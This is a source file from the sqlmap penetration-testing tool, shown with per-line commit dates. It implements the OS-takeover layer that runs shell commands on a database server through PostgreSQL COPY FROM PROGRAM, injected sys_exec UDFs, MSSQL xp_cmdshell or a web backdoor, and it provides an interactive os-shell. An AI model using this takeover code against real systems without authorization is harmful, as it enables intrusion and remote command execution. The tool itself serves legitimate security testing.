2019-05-08 13:47:52 +03:00
|
|
|
#!/usr/bin/env python
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
"""
|
2024-01-04 01:11:52 +03:00
|
|
|
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
2017-10-11 15:50:46 +03:00
|
|
|
See the file 'LICENSE' for copying permission
|
2009-04-22 15:48:07 +04:00
|
|
|
"""
|
|
|
|
|
2019-01-22 03:28:24 +03:00
|
|
|
from __future__ import print_function
|
|
|
|
|
2015-01-15 14:42:32 +03:00
|
|
|
import sys
|
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
from lib.core.common import Backend
|
2019-06-04 15:44:06 +03:00
|
|
|
from lib.core.common import dataToStdout
|
2012-07-10 03:19:32 +04:00
|
|
|
from lib.core.common import getSQLSnippet
|
2013-02-13 12:57:16 +04:00
|
|
|
from lib.core.common import isStackingAvailable
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.common import readInput
|
2019-05-06 01:54:21 +03:00
|
|
|
from lib.core.convert import getUnicode
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.data import conf
|
2019-10-17 16:16:21 +03:00
|
|
|
from lib.core.data import kb
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.data import logger
|
2014-09-16 11:07:31 +04:00
|
|
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
2010-11-08 12:20:02 +03:00
|
|
|
from lib.core.enums import DBMS
|
2014-09-16 16:12:43 +04:00
|
|
|
from lib.core.enums import OS
|
2013-01-23 05:27:01 +04:00
|
|
|
from lib.core.exception import SqlmapFilePathException
|
2012-12-06 17:14:19 +04:00
|
|
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.core.shell import autoCompletion
|
2012-07-02 05:04:19 +04:00
|
|
|
from lib.request import inject
|
2009-04-22 15:48:07 +04:00
|
|
|
from lib.takeover.udf import UDF
|
2010-01-14 17:03:16 +03:00
|
|
|
from lib.takeover.web import Web
|
2016-12-20 01:47:39 +03:00
|
|
|
from lib.takeover.xp_cmdshell import XP_cmdshell
|
2019-09-11 15:05:25 +03:00
|
|
|
from lib.utils.safe2bin import safechardecode
|
2019-05-02 01:45:44 +03:00
|
|
|
from thirdparty.six.moves import input as _input
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2016-12-20 01:47:39 +03:00
|
|
|
class Abstraction(Web, UDF, XP_cmdshell):
|
2009-04-22 15:48:07 +04:00
|
|
|
"""
|
|
|
|
This class defines an abstraction layer for OS takeover functionalities
|
2016-12-20 01:47:39 +03:00
|
|
|
to UDF / XP_cmdshell objects
|
2009-04-22 15:48:07 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
def __init__(self):
|
|
|
|
self.envInitialized = False
|
2010-02-25 14:40:49 +03:00
|
|
|
self.alwaysRetrieveCmdOutput = False
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
UDF.__init__(self)
|
2010-01-14 17:03:16 +03:00
|
|
|
Web.__init__(self)
|
2016-12-20 01:47:39 +03:00
|
|
|
XP_cmdshell.__init__(self)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-10-28 04:19:40 +04:00
|
|
|
def execCmd(self, cmd, silent=False):
|
2019-03-22 15:49:52 +03:00
|
|
|
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
|
|
|
|
self.copyExecCmd(cmd)
|
|
|
|
|
2019-10-17 16:16:21 +03:00
|
|
|
elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):
|
2010-01-14 17:33:08 +03:00
|
|
|
self.webBackdoorRunCmd(cmd)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
2013-01-09 18:38:41 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
2009-09-26 03:03:45 +04:00
|
|
|
self.udfExecCmd(cmd, silent=silent)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
2010-10-29 17:09:53 +04:00
|
|
|
self.xpCmdshellExecCmd(cmd, silent=silent)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
else:
|
|
|
|
errMsg = "Feature not yet implemented for the back-end DBMS"
|
2013-01-04 02:20:55 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def evalCmd(self, cmd, first=None, last=None):
|
2011-05-03 19:31:12 +04:00
|
|
|
retVal = None
|
|
|
|
|
2019-03-22 15:49:52 +03:00
|
|
|
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
|
|
|
|
retVal = self.copyExecCmd(cmd)
|
|
|
|
|
2019-10-17 16:16:21 +03:00
|
|
|
elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):
|
2011-05-03 19:31:12 +04:00
|
|
|
retVal = self.webBackdoorRunCmd(cmd)
|
2010-01-14 17:33:08 +03:00
|
|
|
|
2013-01-09 18:38:41 +04:00
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
2011-05-03 19:31:12 +04:00
|
|
|
retVal = self.udfEvalCmd(cmd, first, last)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
2011-05-03 19:31:12 +04:00
|
|
|
retVal = self.xpCmdshellEvalCmd(cmd, first, last)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
else:
|
|
|
|
errMsg = "Feature not yet implemented for the back-end DBMS"
|
2013-01-04 02:20:55 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-05-03 19:31:12 +04:00
|
|
|
return safechardecode(retVal)
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def runCmd(self, cmd):
|
2017-04-18 16:48:05 +03:00
|
|
|
choice = None
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-02-25 14:40:49 +03:00
|
|
|
if not self.alwaysRetrieveCmdOutput:
|
2011-04-30 17:20:05 +04:00
|
|
|
message = "do you want to retrieve the command standard "
|
|
|
|
message += "output? [Y/n/a] "
|
2017-07-26 01:54:29 +03:00
|
|
|
choice = readInput(message, default='Y').upper()
|
2010-11-03 13:08:27 +03:00
|
|
|
|
2017-07-26 01:54:29 +03:00
|
|
|
if choice == 'A':
|
2010-02-25 14:40:49 +03:00
|
|
|
self.alwaysRetrieveCmdOutput = True
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2017-07-26 01:54:29 +03:00
|
|
|
if choice == 'Y' or self.alwaysRetrieveCmdOutput:
|
2009-04-22 15:48:07 +04:00
|
|
|
output = self.evalCmd(cmd)
|
|
|
|
|
|
|
|
if output:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.string("command standard output", output)
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-10-21 02:09:03 +04:00
|
|
|
dataToStdout("No output\n")
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-10-28 04:19:40 +04:00
|
|
|
self.execCmd(cmd)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-14 17:33:08 +03:00
|
|
|
def shell(self):
|
2019-10-17 16:16:21 +03:00
|
|
|
if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "calling OS shell. To quit type "
|
2010-01-14 17:33:08 +03:00
|
|
|
infoMsg += "'x' or 'q' and press ENTER"
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
else:
|
2019-03-22 15:49:52 +03:00
|
|
|
if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
|
|
|
|
infoMsg = "going to use 'COPY ... FROM PROGRAM ...' "
|
|
|
|
infoMsg += "command execution"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
|
|
|
infoMsg = "going to use injected user-defined functions "
|
|
|
|
infoMsg += "'sys_eval' and 'sys_exec' for operating system "
|
2010-01-14 17:33:08 +03:00
|
|
|
infoMsg += "command execution"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
2019-03-22 15:49:52 +03:00
|
|
|
infoMsg = "going to use extended procedure 'xp_cmdshell' for "
|
2010-01-14 17:33:08 +03:00
|
|
|
infoMsg += "operating system command execution"
|
|
|
|
logger.info(infoMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-14 17:33:08 +03:00
|
|
|
else:
|
|
|
|
errMsg = "feature not yet implemented for the back-end DBMS"
|
2013-01-04 02:20:55 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
2010-01-14 17:33:08 +03:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows")
|
2010-01-14 17:33:08 +03:00
|
|
|
infoMsg += "'x' or 'q' and press ENTER"
|
|
|
|
logger.info(infoMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2014-09-16 16:12:43 +04:00
|
|
|
autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
while True:
|
|
|
|
command = None
|
|
|
|
|
|
|
|
try:
|
2019-05-02 01:45:44 +03:00
|
|
|
command = _input("os-shell> ")
|
2015-01-15 14:42:32 +03:00
|
|
|
command = getUnicode(command, encoding=sys.stdin.encoding)
|
2009-04-22 15:48:07 +04:00
|
|
|
except KeyboardInterrupt:
|
2019-01-22 03:28:24 +03:00
|
|
|
print()
|
2009-04-22 15:48:07 +04:00
|
|
|
errMsg = "user aborted"
|
|
|
|
logger.error(errMsg)
|
|
|
|
except EOFError:
|
2019-01-22 03:28:24 +03:00
|
|
|
print()
|
2009-04-22 15:48:07 +04:00
|
|
|
errMsg = "exit"
|
|
|
|
logger.error(errMsg)
|
|
|
|
break
|
|
|
|
|
|
|
|
if not command:
|
|
|
|
continue
|
|
|
|
|
2013-01-09 18:38:41 +04:00
|
|
|
if command.lower() in ("x", "q", "exit", "quit"):
|
2009-04-22 15:48:07 +04:00
|
|
|
break
|
|
|
|
|
|
|
|
self.runCmd(command)
|
|
|
|
|
2012-12-06 17:14:19 +04:00
|
|
|
def _initRunAs(self):
|
2012-07-24 17:34:50 +04:00
|
|
|
if not conf.dbmsCred:
|
2012-07-02 05:04:19 +04:00
|
|
|
return
|
|
|
|
|
2013-02-13 12:57:16 +04:00
|
|
|
if not conf.direct and not isStackingAvailable():
|
2013-04-29 14:14:00 +04:00
|
|
|
errMsg = "stacked queries are not supported hence sqlmap cannot "
|
2012-07-02 05:04:19 +04:00
|
|
|
errMsg += "execute statements as another user. The execution "
|
|
|
|
errMsg += "will continue and the DBMS credentials provided "
|
|
|
|
errMsg += "will simply be ignored"
|
|
|
|
logger.error(errMsg)
|
|
|
|
|
|
|
|
return
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.MSSQL):
|
|
|
|
msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function "
|
|
|
|
msg += "is disabled by default. This function is needed to execute "
|
|
|
|
msg += "statements as another DBMS user since you provided the "
|
2013-04-29 14:14:44 +04:00
|
|
|
msg += "option '--dbms-creds'. If you are DBA, you can enable it. "
|
2012-07-02 05:04:19 +04:00
|
|
|
msg += "Do you want to enable it? [Y/n] "
|
|
|
|
|
2017-04-18 16:48:05 +03:00
|
|
|
if readInput(msg, default='Y', boolean=True):
|
2012-07-10 03:19:32 +04:00
|
|
|
expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1")
|
2012-07-02 05:04:19 +04:00
|
|
|
inject.goStacked(expression)
|
|
|
|
|
|
|
|
# TODO: add support for PostgreSQL
|
2018-03-13 15:45:42 +03:00
|
|
|
# elif Backend.isDbms(DBMS.PGSQL):
|
|
|
|
# expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1")
|
|
|
|
# inject.goStacked(expression)
|
2012-07-02 05:04:19 +04:00
|
|
|
|
2013-02-14 21:39:19 +04:00
|
|
|
def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):
|
2012-12-06 17:14:19 +04:00
|
|
|
self._initRunAs()
|
2012-07-02 05:04:19 +04:00
|
|
|
|
2013-02-14 21:39:19 +04:00
|
|
|
if self.envInitialized and not forceInit:
|
2009-04-22 15:48:07 +04:00
|
|
|
return
|
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
if web:
|
|
|
|
self.webInit()
|
|
|
|
else:
|
|
|
|
self.checkDbmsOs(detailed)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-14 18:11:32 +03:00
|
|
|
if mandatory and not self.isDba():
|
2012-07-13 16:33:16 +04:00
|
|
|
warnMsg = "functionality requested probably does not work because "
|
2017-08-20 11:02:26 +03:00
|
|
|
warnMsg += "the current session user is not a database administrator"
|
2012-07-02 18:02:00 +04:00
|
|
|
|
2013-01-09 18:38:41 +04:00
|
|
|
if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
|
2012-07-17 03:25:02 +04:00
|
|
|
warnMsg += ". You can try to use option '--dbms-cred' "
|
2012-07-02 18:02:00 +04:00
|
|
|
warnMsg += "to execute statements as a DBA user if you "
|
|
|
|
warnMsg += "were able to extract and crack a DBA "
|
|
|
|
warnMsg += "password by any mean"
|
|
|
|
|
2022-06-22 13:04:34 +03:00
|
|
|
logger.warning(warnMsg)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2019-03-22 15:49:52 +03:00
|
|
|
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():
|
|
|
|
success = True
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
2013-01-23 05:27:01 +04:00
|
|
|
success = self.udfInjectSys()
|
|
|
|
|
|
|
|
if success is not True:
|
|
|
|
msg = "unable to mount the operating system takeover"
|
|
|
|
raise SqlmapFilePathException(msg)
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
2010-01-14 18:11:32 +03:00
|
|
|
if mandatory:
|
|
|
|
self.xpCmdshellInit()
|
|
|
|
else:
|
|
|
|
errMsg = "feature not yet implemented for the back-end DBMS"
|
2012-12-06 17:14:19 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
2010-01-04 18:02:56 +03:00
|
|
|
|
|
|
|
self.envInitialized = True
|